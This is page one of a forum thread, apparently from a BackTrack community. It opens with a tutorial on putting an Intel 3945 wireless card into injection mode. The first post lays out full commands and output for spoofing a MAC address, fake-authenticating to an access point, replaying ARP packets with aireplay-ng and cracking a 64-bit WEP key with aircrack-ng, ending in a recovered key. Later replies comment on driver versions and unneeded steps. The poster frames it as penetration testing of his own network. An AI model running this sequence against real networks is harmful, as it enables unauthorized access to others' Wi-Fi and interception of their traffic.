Page 1 of 3 123 LastLast
Results 1 to 10 of 26

Thread: Intel 3945 Injection & Fixes For Aircrack-ng BT3 Beta

  1. #1
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Cool Intel 3945 Injection & Fixes For Aircrack-ng BT3 Beta

    PLEASE USE A COLOR EVERY ONE CAN READ. Not every one uses the black razor style. Some of us like the default style which is mainly white. Thank you for your cooperation. ---Pureh@te



    remove old aircrack-ng 0.9 or whatever version you have
    bt ~ #make uninstall

    download
    bt ~ #svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng
    bt ~ #cd aircrack-ng
    bt aircrack-ng #gmake SQLITE=true
    bt aircrack-ng #gmake SQLITE=true install

    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    wmaster0 no wireless extensions.

    wlan0 IEEE 802.11g ESSID:"" Nickname:""
    Mode:Managed Channel:0 Access Point: Not-Associated
    Tx-Power=0 dBm
    Retry min limit:7 RTS thr:off Fragment thr=2346 B
    Encryption key:off
    Power Management:off
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0


    bt ~ #modprobe -r iwl3945
    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    bt ~ #modprobe ipwraw

    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    wifi0 unassociated ESSID:off/any
    Mode:Monitor Channel=1 Bit Rate=54 Mb/s

    rtap0 no wireless extensions.

    here you are.you have enabled your intel3945 NIC to do discovery/injetion and penetration testing

    bt ~ #ifconfig wifi0 down
    bt ~ # macchanger --mac 00:10:20:30:40:50 wifi0
    Current MAC: 00:ab:ab:ab:ab:ab (unknown)
    Faked MAC: 00:10:20:30:40:50 (Welch Allyn, Data Collection)
    mac spoofing for security. upto u :)
    bt ~ #ifconfig wifi0 up
    bt ~ # ifconfig wifi0
    wifi0 Link encap:UNSPEC HWaddr 00-10-20-30-40-50-D8-54-00-00-00-00-00-00-00-00
    UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:2346 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 b) TX bytes:108 (108.0 b)
    Interrupt:19 Base address:0x6000 Memory:f4300000-f4300fff
    bt ~ # airmon-ng start wifi0

    Interface Chipset Driver

    wifi0 Centrino a/b/g ipwraw-ng (monitor mode enabled)


    bt ~ #airodump-ng wifi0

    get the SSID of your network AP
    and stop using ctrl+c because we dont want to unnecessariliy capture other ap's data.

    bt ~ # airodump-ng -c 11 -w pentest --bssid 00:08:5C:7B:9E:B5 wifi0
    (let the airodump window keep running to capture enough packets)

    CH 11 ][ Elapsed: 9 mins ][ 2008-02-20 13:43

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:08:5C:7B:9E:B5 0 100 4537 54723 0 11 54 WEP WEP OPN Narayan-sivenara

    BSSID STATION PWR Rate Lost Packets Probes

    00:08:5C:7B:9E:B5 00:10:20:30:40:50 0 0- 0 0 73393

    bt ~ # aireplay-ng -1 0 -a 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
    13:35:08 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11

    13:35:08 Sending Authentication Request (Open System) [ACK]
    13:35:08 Authentication successful
    13:35:08 Sending Association Request [ACK]
    13:35:08 Association successful :-)

    bt ~ # aireplay-ng -3 -b 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
    13:35:56 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11
    Saving ARP requests in replay_arp-0220-133556.cap
    You should also start airodump-ng to capture replies.
    Read 129275 packets (got 54575 ARP requests and 70947 ACKs), sent 83561 packets...(499 pps)

    bt ~ # aircrack-ng -n 64 --bssid 00:08:5C:7B:9E:B5 pentest-01.cap
    Opening pentest-01.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 54722 ivs.
    KEY FOUND! [ 98:45:00:88:57 ]
    Decrypted correctly: 100%

    I hope this tutorial will help all the people having Intel3945 NIC for penetration testing and vulnerability test.thanks a lot to exploitz for making such wonderful tutorials and videos.if any mistake you found please let me know I will correct it.I am happy to be a proud member of this so full of knowledge forum with lots of tutorial.
    Tested On:
    My laptop Specification
    compaq presario v3000(v3607TU)
    Dual Core 1.6 GHz With 1 MB L2 Cache
    Intel 956GM Chipset
    120 GB HDD
    4 GB Transcend DDR2 667 MHz RAM
    Intel X3100 PCI-E
    Running OS.Backtrack 3 Beta Dual Boot With Windows Vista
    Vmware on Vista Running OS:Windows Server 2003 Enterprise Edition With IIS 6.0/ADS,Windows Xp Professional with SP3 latest updated,Sun Solaris 10,BackTrack 3

    My Computer Specification
    Pentium 4 1.7 GHz PGA 478 socket
    Intel 850 MB orignal MB
    1 GB RDRAM PC800 Samsung
    200 GB HDD IDE Segate Baracuda 7200 RPM 160 GB + Segate Baracuda 5400 RPM 40 GB
    Asus Geforce 2 GTS 128 MB AGP 4x
    Running OS Windows XP Pro With SP3 ,Dual Boot With BT 3 Beta karnel 2.6.21.5

    Here are proofs





  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    secure_it, I'm a little unclear as to why you wrote this. Its not that we as a community don't appreciate the input however there is a lot of unnecessary steps in your tutorial.

    Backtrack 3 beta already has the drivers for the ipw3495. The drivers are located in the /usr/src/drivers folder. The illwifi drivers are for connecting and surfing the net and the ipwraw drivers are for injection. There was a small issue with the kde menu links which I fixed the first day and posted to the wiki. The menu fixes will load and unload the drivers perfectly.

    Another important fact about these drivers you forgot to mention is that you must always UNLOAD one before loading the other one.

    I'm not picking on you at all and I appreciate the work you must have spent on this I'm just pointing out that most of this stuff is included in backtrack 3 beta already and is ready to go.

    So if any one is using this tutorial they can make the menu fixes and then start at the airodump-ng part.

    I will however move this to the tutorial section.

  3. #3
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Also (deja vu) I just mentioned to someone else in another post about this issue:

    http://forums.remote-exploit.org/sho...ght=ipw3945.sh
    dd if=/dev/swc666 of=/dev/wyze

  4. #4
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Thumbs up

    thanks for your valuable opinions pureh@te.my intention was just to clear the doubts about "can intel 3945 inject packets" that's it.because I found many users were wandering about aircrack-ng freezing while using intel 3945 drivers or something like confusion about intel 3945 able to inject or monitor with airodump.So I thought to make things clear and collected at single place to prove intel 3945 can inject using ipwraw drivers and I have used modprobe to load/unload drivers.anyways thanks for all what you have mention regarding fixes.I am glad to say that I am contributing something to this forum and to take help and giving help to newbies there.thanks once again to all senior member outta there.



    Secure_it
    M.Sc(IT),DOEACC A Level,MCSE:Security,Comptia Security+,Cisco CCNA,EC CEH
    Next Target Offensive Security 101v2 & Wifoo.

  5. #5
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    6

    Default

    hey Good lol this will help few people and 1 more thing ,i think that is 64 bit WEP
    key not 128 what u got KEY FOUND! [ 98:45:00:88:57 ]


    Evil Monkey
    (You are entering the lands of packets, brute force and misuse of trust.
    This is a dark land. Full of problems and choices. Be carefull when you use your knowledge. Be also carefull with your tools and weapons. Never underestimate your enemy. )

  6. #6
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    5

    Thumbs up comments...

    secure_it
    you told me to come here check your post, so here are my comments:

    There is a new ipwraw-ng version available... You should have referred to it instead of 2.0.0
    The newest file in ASPj's page is now ipwraw-ng-2.3.4-04022008.tar.bz2
    The best would be to go to /usr/src/drivers and put the new version there, on top of the old one.

    Some unnecessary steps:
    • bt ~ # depmod -ae (the driver's "make install" already does it)
    • remove old aircrack-ng 0.9 or whatever version you have (I think the executable files have the same name as old ones, so you just need to install the new version over the old)
    • bt aircrack-ng #gmake SQLITE=true (is this really necessary?...)
    • Restart the system (is it necessary? if you're using a live CD this will make you lose what you've done until now...)

    All those iwconfig aren't needed also, but it's nice to have them there. It provides useful info to the target viewers of your post so they can know if they're doing things right at each step
    And if they do the things right, they'll be happy and won't come here to make questions
    Nice to see a complete guide like this, showing that the card works, and how.

  7. #7
    Junior Member
    Join Date
    Oct 2007
    Posts
    59

    Default

    very nice, secure_it... defenitly one of the best, most complete and understandable tutorials i've seen around.

    Thanks.
    CPU: Mobile DualCore Intel Core 2 Duo T7200, 2000 MHz (12 x 167)- 2Ghz
    Chipset: Mobile Intel Calistoga i945PM
    RAM: 2048 Mb (DDR2-667 DDR2 SDRAM)
    Graphics Card: NVIDIA GeForce Go 7950 GTX (512 Mb)
    Audio: SigmaTel STAC9200 @ Intel 82801GBM ICH7-M - High Definition Audio Controller [A-1]
    Network Card: Broadcom NetXtreme 57xx Gigabit Controller
    Wireless Card: Intel® PRO/Wireless 3945ABG Network Connection
    Modem: Conexant HDA D110 MDC V.92 Modem

  8. #8
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Smile

    thanks dude.its all because of tutorials/posts around in remote exploit,wifiway,aircrack-ng forums and google & specially the tutorials by Xploitz

  9. #9
    Junior Member
    Join Date
    Oct 2007
    Posts
    59

    Default

    yeah, but you've put it into one comprehensive tutorial. by the way I didnt quite understand if all the commands are correct or not? so in theory if I did that all, I should be able to inject?

    (purehate said something about unmounting, did you put those in?)

    Thanks.
    CPU: Mobile DualCore Intel Core 2 Duo T7200, 2000 MHz (12 x 167)- 2Ghz
    Chipset: Mobile Intel Calistoga i945PM
    RAM: 2048 Mb (DDR2-667 DDR2 SDRAM)
    Graphics Card: NVIDIA GeForce Go 7950 GTX (512 Mb)
    Audio: SigmaTel STAC9200 @ Intel 82801GBM ICH7-M - High Definition Audio Controller [A-1]
    Network Card: Broadcom NetXtreme 57xx Gigabit Controller
    Wireless Card: Intel® PRO/Wireless 3945ABG Network Connection
    Modem: Conexant HDA D110 MDC V.92 Modem

  10. #10
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Thumbs up

    things will work absolutely fine if you follow this tutorial then you will be able to inject packet on your ap and can check how much insecure is WEP to use today.well I have done all things correctly and by mounting and dismounting drivers is modprobing them.check that.thanks for watching and please let me know things are working fine at your end too.if any conflict post it here and if success then please let me know.



    Secure_it

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •